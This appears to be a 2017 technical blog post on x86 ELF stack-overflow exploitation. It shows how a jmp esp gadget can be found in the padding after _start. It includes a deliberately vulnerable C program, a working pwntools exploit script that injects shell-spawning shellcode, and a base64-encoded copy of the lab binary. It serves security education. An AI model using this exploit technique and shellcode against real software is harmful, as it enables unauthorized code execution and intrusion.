Tech Rain
x86 ELF Stack Overflow Jmp Esp (Rsp) Trick
2017/01/24 12:27In short: You can find jmp esp (jmp rsp) gadget in almost every dynamic linked ELF binary.
Here's a common _start from a x86 ELF binary:
080488d3 <_start>:
80488d3: 31 ed xor ebp,ebp
80488d5: 5e pop esi
80488d6: 89 e1 mov ecx,esp
80488d8: 83 e4 f0 and esp,0xfffffff0
80488db: 50 push eax
80488dc: 54 push esp
80488dd: 52 push edx
80488de: 68 80 8f 04 08 push 0x8048f80
80488e3: 68 10 8f 04 08 push 0x8048f10
80488e8: 51 push ecx
80488e9: 56 push esi
80488ea: 68 b0 88 04 08 push 0x80488b0
80488ef: e8 cc fe ff ff call 80487c0 <__libc_start_main@plt>
80488f4: f4 hlt
80488f5: 66 90 xchg ax,ax
80488f7: 66 90 xchg ax,ax
80488f9: 66 90 xchg ax,ax
80488fb: 66 90 xchg ax,ax
80488fd: 66 90 xchg ax,ax
80488ff: 90 nop
08048900 <__x86.get_pc_thunk.bx>:
8048900: 8b 1c 24 mov ebx,DWORD PTR [esp]
8048903: c3 ret
Use instruction truncation trick, diassembly at 0x080488f3:
80488f3: ff f4 push esp
80488f5: 66 90 xchg ax,ax
80488f7: 66 90 xchg ax,ax
80488f9: 66 90 xchg ax,ax
80488fb: 66 90 xchg ax,ax
80488fd: 66 90 xchg ax,ax
80488ff: 90 nop
8048900: 8b 1c 24 mov ebx,DWORD PTR [esp]
8048903: c3 ret
Which equals to:
80488f3: ff f4 push esp
8048900: 8b 1c 24 mov ebx,DWORD PTR [esp]
8048903: c3 ret
We know that: jmp $ADDR equals to push $ADDR; ret.
So, once you got a binary without NX (DEP), this gadget would be super useful!
Sample
easybof.c:
// gcc-4.8 easybof.c -o easybof -m32 -zexecstack -fno-stack-protector -D_FORTIFY_SOURCE=0 -O3
#include <unistd.h>
int main()
{
char buff[8];
write(1, "Overflow me plz:", 16);
read(0, buff, 128);
}
exploit.py:
#!/usr/bin/env python2
from pwn import * # pip2 install pwntools
ELF.find = lambda self, sig: next(elf.search(sig))
elf = ELF('easybof')
ret = elf.find('\xc3')
jmp_esp = elf.find('\xff\xff\xf4') + 1
print 'RET gadget at 0x%.8x' % ret
print 'JMP_ESP gadget at 0x%.8x' % jmp_esp
context(arch='i386', os='linux')
io = process('./easybof')
shellcode = asm(shellcraft.sh())
payload = p32(ret) * 6 + p32(jmp_esp) + shellcode
io.recvuntil(':')
io.send(payload.ljust(128))
io.sendline('id')
print io.recvline()[:-1]
io.interactive()
easybof.elf (base64 encoded):
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
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQhAQIMIQECAAAAAABAAAAAQAAAAwA
AADIggQIDQAAAOSEBAgZAAAACJ8ECBsAAAAEAAAAGgAAAAyfBAgcAAAABAAAAPX+/2+sgQQIBQAAACyCBAgGAAAAzIEECAoAAABQAAAACwAAABAAAAAVAAAA
AAAAAAMAAAAAoAQIAgAAABgAAAAUAAAAEQAAABcAAACwggQIEQAAAKiCBAgSAAAACAAAABMAAAAIAAAA/v//b4iCBAj///9vAQAAAPD//298ggQIAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSfBAgAAAAAAAAAAAaDBAgWgwQIJoMECAAAAAAAAAAAR0NDOiAoVWJ1bnR1
IDQuOC41LTR1YnVudHUyKSA0LjguNQAALnNoc3RydGFiAC5pbnRlcnAALm5vdGUuQUJJLXRhZwAubm90ZS5nbnUuYnVpbGQtaWQALmdudS5oYXNoAC5keW5z
eW0ALmR5bnN0cgAuZ251LnZlcnNpb24ALmdudS52ZXJzaW9uX3IALnJlbC5keW4ALnJlbC5wbHQALmluaXQALnBsdC5nb3QALnRleHQALmZpbmkALnJvZGF0
YQAuZWhfZnJhbWVfaGRyAC5laF9mcmFtZQAuaW5pdF9hcnJheQAuZmluaV9hcnJheQAuamNyAC5keW5hbWljAC5nb3QucGx0AC5kYXRhAC5ic3MALmNvbW1l
bnQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAsAAAABAAAAAgAAAFSBBAhUAQAAEwAAAAAAAAAAAAAAAQAAAAAAAAATAAAA
BwAAAAIAAABogQQIaAEAACAAAAAAAAAAAAAAAAQAAAAAAAAAIQAAAAcAAAACAAAAiIEECIgBAAAkAAAAAAAAAAAAAAAEAAAAAAAAADQAAAD2//9vAgAAAKyB
BAisAQAAIAAAAAUAAAAAAAAABAAAAAQAAAA+AAAACwAAAAIAAADMgQQIzAEAAGAAAAAGAAAAAQAAAAQAAAAQAAAARgAAAAMAAAACAAAALIIECCwCAABQAAAA
AAAAAAAAAAABAAAAAAAAAE4AAAD///9vAgAAAHyCBAh8AgAADAAAAAUAAAAAAAAAAgAAAAIAAABbAAAA/v//bwIAAACIggQIiAIAACAAAAAGAAAAAQAAAAQA
AAAAAAAAagAAAAkAAAACAAAAqIIECKgCAAAIAAAABQAAAAAAAAAEAAAACAAAAHMAAAAJAAAAQgAAALCCBAiwAgAAGAAAAAUAAAAYAAAABAAAAAgAAAB8AAAA
AQAAAAYAAADIggQIyAIAACMAAAAAAAAAAAAAAAQAAAAAAAAAdwAAAAEAAAAGAAAA8IIECPACAABAAAAAAAAAAAAAAAAQAAAABAAAAIIAAAABAAAABgAAADCD
BAgwAwAACAAAAAAAAAAAAAAACAAAAAAAAACLAAAAAQAAAAYAAABAgwQIQAMAAKIBAAAAAAAAAAAAABAAAAAAAAAAkQAAAAEAAAAGAAAA5IQECOQEAAAUAAAA
AAAAAAAAAAAEAAAAAAAAAJcAAAABAAAAAgAAAPiEBAj4BAAAGQAAAAAAAAAAAAAABAAAAAAAAACfAAAAAQAAAAIAAAAUhQQIFAUAACwAAAAAAAAAAAAAAAQA
AAAAAAAArQAAAAEAAAACAAAAQIUECEAFAADAAAAAAAAAAAAAAAAEAAAAAAAAALcAAAAOAAAAAwAAAAifBAgIDwAABAAAAAAAAAAAAAAABAAAAAAAAADDAAAA
DwAAAAMAAAAMnwQIDA8AAAQAAAAAAAAAAAAAAAQAAAAAAAAAzwAAAAEAAAADAAAAEJ8ECBAPAAAEAAAAAAAAAAAAAAAEAAAAAAAAANQAAAAGAAAAAwAAABSf
BAgUDwAA6AAAAAYAAAAAAAAABAAAAAgAAACGAAAAAQAAAAMAAAD8nwQI/A8AAAQAAAAAAAAAAAAAAAQAAAAEAAAA3QAAAAEAAAADAAAAAKAECAAQAAAYAAAA
AAAAAAAAAAAEAAAABAAAAOYAAAABAAAAAwAAABigBAgYEAAACAAAAAAAAAAAAAAABAAAAAAAAADsAAAACAAAAAMAAAAgoAQIIBAAAAQAAAAAAAAAAAAAAAEA
AAAAAAAA8QAAAAEAAAAwAAAAAAAAACAQAAAjAAAAAAAAAAAAAAABAAAAAQAAAAEAAAADAAAAAAAAAAAAAABDEAAA+gAAAAAAAAAAAAAAAQAAAAAAAAA=